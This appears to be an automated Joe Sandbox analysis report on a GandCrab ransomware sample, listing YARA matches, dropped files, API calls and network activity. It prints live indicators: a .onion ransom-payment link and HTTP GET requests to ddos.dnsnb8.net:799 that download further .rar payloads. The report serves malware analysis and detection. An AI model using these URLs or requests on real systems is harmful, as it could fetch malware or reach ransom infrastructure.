Source: SY5DeZW6pz.exe, 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe, 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: SY5DeZW6pz.exe String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: Joe Sandbox View ASN Name: VOXEL-DOT-NETUS VOXEL-DOT-NETUS
Source: Joe Sandbox View IP Address: 63.251.106.25 63.251.106.25
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.4:49707 -> 63.251.106.25:799
Source: vSQshX.exe, 00000001.00000003.310095902.00000000014B0000.00000004.00001000.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.331514201.0000000000C23000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/&
Source: vSQshX.exe, 00000001.00000000.334129715.00000000030C9000.00000004.00000010.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: vSQshX.exe, 00000001.00000000.333684475.000000000142E000.00000004.00000020.00020000.00000000.sdmp, vSQshX.exe, 00000001.00000000.336367143.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar%
Source: vSQshX.exe, 00000001.00000002.360215641.00000000030C9000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: vSQshX.exe, 00000001.00000002.359919761.000000000142E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar%
Source: SY5DeZW6pz.exe String found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comJames
Source: SciTE.exe.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/scite
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comPraveen
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comYann
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comSteve
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintila.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comDenis
Source: SY5DeZW6pz.exe String found in binary or memory: https://tox.chat/download.html
Source: SY5DeZW6pz.exe String found in binary or memory: https://www.torproject.org/
Source: unknown DNS traffic detected: queries for: ddos.dnsnb8.net
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree, 0_2_0F397EF0
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: SY5DeZW6pz.exe, 00000000.00000000.323985361.000000000178A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: Yara match File source: SY5DeZW6pz.exe, type: SAMPLE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SY5DeZW6pz.exe PID: 5580, type: MEMORYSTR
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection, 0_2_0F396530

System Summary

barindex
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab Payload Author: kevoreilly
Source: vSQshX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SY5DeZW6pz.exe Static PE information: section name: |Zu8
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SY5DeZW6pz.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: SY5DeZW6pz.exe, type: SAMPLE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.SY5DeZW6pz.exe.3760000.2.raw.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpack, type: UNPACKEDPE Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, type: MEMORY Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F391C20 0_2_0F391C20
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F391020 0_2_0F391020
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A9B71 0_2_0F3A9B71
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3983C0 0_2_0F3983C0
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C26D00 1_2_00C26D00
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SciTE.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SY5DeZW6pz.exe Static PE information: Number of sections : 57 > 10
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\vSQshX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: vSQshX.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vSQshX.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: SY5DeZW6pz.exe Virustotal: Detection: 81%
Source: SY5DeZW6pz.exe Metadefender: Detection: 65%
Source: SY5DeZW6pz.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SY5DeZW6pz.exe "C:\Users\user\Desktop\SY5DeZW6pz.exe"
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process created: C:\Users\user\AppData\Local\Temp\vSQshX.exe C:\Users\user\AppData\Local\Temp\vSQshX.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00C2119F
